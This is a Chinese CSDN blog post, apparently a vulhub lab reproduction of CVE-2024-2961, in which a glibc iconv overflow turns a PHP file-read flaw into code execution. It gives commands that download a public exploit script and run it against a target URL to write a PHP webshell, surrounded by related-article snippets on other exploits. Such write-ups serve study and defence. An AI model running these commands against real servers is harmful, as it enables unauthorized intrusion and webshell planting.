vulhub中PHP利用GNU C Iconv将文件读取变成RCE(CVE-2024-2961)

最新推荐文章于 2024-10-30 18:01:15 发布
最新推荐文章于 2024-10-30 18:01:15 发布
阅读量873 收藏 3
点赞数 4
分类专栏: vulhub漏洞复现 文章标签: php c语言 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yougexiaojiuguan/article/details/139377474
版权

GNU C 是一个标准的ISO C依赖库。在GNU C中,iconv()函数2.39及以前存在一处缓冲区溢出漏洞,这可能会导致应用程序崩溃或覆盖相邻变量。

如果一个PHP应用中存在任意文件读取漏洞,攻击者可以利用`iconv()`的这个CVE-2024-2961漏洞,将其提升为代码执行漏洞。

漏洞复现

在使用原作者给出的[exploit](https://github.com/ambionics/cnext-exploits)前,你需要准备一个Linux环境和Python 3.10解释器。

安装依赖:
pip install pwntools
pip install https://github.com/cfreal/ten/archive/refs/heads/main.zip

然后从<https://raw.githubusercontent.com/ambionics/cnext-exploits/main/cnext-exploit.py>下载POC并执行:
wget https://raw.githubusercontent.com/ambionics/cnext-exploits/main/cnext-exploit.py
python cnext-exploit.py http://your-ip:8080/index.php "echo '<?=phpinfo();?>' > shell.php"

已经成功写入shell.php:

余生有个小酒馆
关注
专栏目录
PHP-从LFI到RCE(上)
qq_50643984的博客
08-31 1902
利用的lfi本地文件包含,就是包含一个含有php代码的文件,不限制后缀名,也可以临时文件进行条件竞争,当然php是神奇的语言,有伪协议还有fastcgi,还有auto_prepend_file的参数,内存错误异常退出,甚至可以去看php底层代码,这些特性还有很多,值得我们探索。接下来我们可以从几道ctf题来看一下lfi到rce。...
PHP iconv漏洞
12-07 227
最近在做一个项目,用iconv转化UTF-8为GB2312时老是少转几千字。后来上网一查才发现iconv在遇到“-”时后面的字节就不转了直接丢了。 所以最好用mb_convert_encoding 转载于:https://www.cnblogs.com/traxex/archive/2011/12/07/5850915.html...
CVE-2024-2961:将phpfilter任意文件读取提升为远程代码执行(RCE
jennycisp的博客
07-03 1911
在nvd网站上是这样描述的:谷歌翻译过来就是:GNU C 库 (也就是glibc)2.39 及更早版本iconv() 函数在将字符串转换为 ISO-2022-CN-EXT 字符集时,可能会使传递给它的输出缓冲区溢出最多 4 个字节,这可能会导致应用程序崩溃或覆盖相邻变量。缓冲区溢出是二进制安全研究领域里很常见的漏洞。所谓缓冲区溢出是指当一段程序尝试把更多的数据放入一个缓冲区,数据超出了缓冲区本身的容量,导致数据溢出到被分配空间之外的内存空间,使得溢出的数据覆盖了其他内存空间的数据。
深入探究宽字节注入漏洞与修补原理
热门推荐
Exploit的小站~
05-10 1万+
 0、前言 最近要为了自动化审计搜集所有PHP漏洞,在整理注入的时候,发现宽字节注入使用iconv造成的漏洞原理没有真正搞懂,网上的文章也说得不是很清楚,于是看了荣哥(lxsec)以前发的一篇http://www.91ri.org/8611.html,加上我们两个人的讨论,最终有了这一篇深入的研究成果。 1、概述 主要是由于使用了宽字节编码造成的。 什么是字符集? 计算机显...
php的icov()函数,PHPiconv函数知识汇总
weixin_28909503的博客
04-10 1893
今天在修改论文在线的时候,遇到了iconv这个函数。学习一下header('Content-Type:application/vnd.ms-excel;charset=UTF-8"');$name=iconv('utf-8','gb2312',$data['year'].'年,第'.$data['period'].'期通信录');header('Content-Disposition:attach...
CVE-2024-2961复现
kjdfklha的博客
06-04 1861
glibciconv()有一个字节溢出,用于转换编码,将一些数据转换成ISO-2022-CN-EXT时会有单字节溢出。// hexdump 函数的实现int i;for (i = 0;i < buflen;i++) {char input[0x10] = "AAAAA劄";作为一个web狗,会一点pwn、reverse很正常得对吧?iconv源码分析在译文有,有兴趣自行查阅。php底层是通过C实现的,CTF技巧常见的。
phpsubstr漏洞,PHP iconv_substr()函数断处理信息泄露漏洞
weixin_36484465的博客
03-12 291
发布日期:2009-05-18更新日期:2010-05-20受影响系统:PHP PHP <= 5.3.2PHP PHP <= 5.2.13描述:--------------------------------------------------------------------------------PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTMLPHP...
探秘CNEXT漏洞利用:从缓冲区溢出到远程代码执行的旅程
gitblog_00092的博客
06-04 483
探秘CNEXT漏洞利用:从缓冲区溢出到远程代码执行的旅程 去发现同类优质开源项目:https://gitcode.com/ 1、项目介绍 CNEXT exploits 是一个专门针对CNEXT(CVE-2024-2961)安全漏洞的开源项目,该漏洞存在于glibc库的iconv()函数。这个项目由网络安全研究者[@cfreal_]发起,并提供了深入的技术分析和实际的exploit实现。 2、项目...
exp:CVE-2024-2961phpfilter任意文件读取提升为远程代码执行(RCE
最新发布
qq_73993347的博客
10-30 443
再说一下正则表达式参数reg,index.php向页面响应了一个字符串,exp需要拿到$data才能进行下一步的操作,所以有了如下的正则表达式。另外一提,这个exp不是只适用于file_get_contents,file也是适用的,但是file读取文件读到的是一个数组,需要拼接为字符串。abcd(.*)是一个正则表达式,为了匹配到echo打印在页面的file_get_contents的返回值。显然这个表达式也不通用,所以我修改脚本,添加了reg参数,不过这个正则表达式就需要自己写了。
GNU-Toolchain-for-Windows:Windows完整GNU工具链的二进制文件
04-10
该存储库是二进制文件的集合,用于创建您自己的Windows可用的GNU工具链。 master分支的主干包含所有二进制文件的最新版本的总和。 提供了以下程序的二进制文件: 海湾合作委员会7 海湾合作委员会8 海湾合作...
radioconda-2024.01.26-Windows-x86-64.rar
04-04
GNURadio 软件无线电平台windows平台上使用软件安装包
CVE-2024-38428 Wget 漏洞:你需要知道的一切
技术超强的网络安全平台
08-26 760
Wget是一款流行的程序,用于从服务器下载内容,是 GNU 项目的一部分。它主要支持 HTTP 和 FTP 协议。RFC-2396是 1998 年制定的过时标准,它定义了 URL 的语法和格式。一般来说,URL 的形式为。部分包含有关用户的信息,例如用户名。虽然该标准已经过时,但它是 Wget负责解析 URLuserinfo的文件使用的标准。url.c我们发现 Wget 无法userinfo正确解析。根据标准,URI 可以在其 包含分号userinfo。
Reids RCE-CVE-2022-0543 复现
weixin_52532634的博客
02-02 403
local f = io.popen("在这里命令", "r");编写、支持网络、可基于内存亦可持久化的日志型、键值存储数据库,并提供多种语言的API。如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问。一般都是默认的端口好6379,这里端口号是环境映射的。
复现CVE-2022-31793(muhttpd 任意文件读取漏洞)
记录并分享学习安全的知识点..
09-11 1173
muhttpd(mu-HTTP-deamon)是一个简单但完整的web服务器,用可移植的ANSI C编写。它支持静态页面、CGI脚本、基于MIME类型的处理程序和HTTPS。它在接受任何连接之前放弃特权,并且可以记录接收到的请求。它已经在GNU/Linux、NetBSD、FreeBSD、Mac OS X和Cygwin上进行了测试。它在32位和64位、小端和大端系统上成功运行。 muhttpd 1.1.7之前版本存在安全漏洞。攻击者利用该漏洞读取系统任意文件
【Web】XGCTF 西瓜杯 超详细题解
uuzeray的博客
09-10 1719
var_export() 确保 $config 数组可以被转换为合法的 PHP 代码并存储到文件,以便下次项目运行时这些新的配置可以被加载和应用。它的主要功能是在用户请求时检查是否有可用的缓存,如果缓存可用则直接返回缓存内容,从而避免重新处理请求,提升性能。substrstr($data) 的作用是从输入的字符串 $data ,提取第一个方括号 [ 和 ] 之间的内容。同时我们逃逸出的字符不能大于原来的字符数量,所以我们可以传参start来调整原字符的数量,以此逃逸出预期的字符。
Adobe Magento OR Commerce电子商务系统 XXE漏洞复现(CVE-2024-34102)
0xSec
06-28 1017
2024年6月,Adobe官方披露CVE-2024-34102 Magento estimate-shipping-methods XXE漏洞,攻击者可在无需登陆的情况下构造恶意请求利用XXE读取文件,或者结合CVE-2024-2961 可能造成远程代码执行。
CVE-2022–26923漏洞分析
阿道夫的博客
01-31 1197
本次漏洞产生的主要原因是计算机账户关键属性的ACL设置问题和ADCS检查客户端身份不严格导致,结合之前的samAccountName欺骗漏洞,AD域涉及身份认证标识的问题不止一次,微软在AD域不用具有唯一性的自动编号字段SID而是其他字段作为身份认证标识在安全方面着实欠妥。本次漏洞利用简单,流量特征不明显难以检测,同时获取的AD域证书有效时间长,因此对于AD域的提权和权限维持都有很高的利用价值。一次,微软在AD域不用具有唯一性的自动编号字段SID而是其他字段作为身份认证标识在安全方面着实欠妥。
XGCTF web部分wp
2301_79700060的博客
07-12 1041
开题就几行代码:读取flag。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值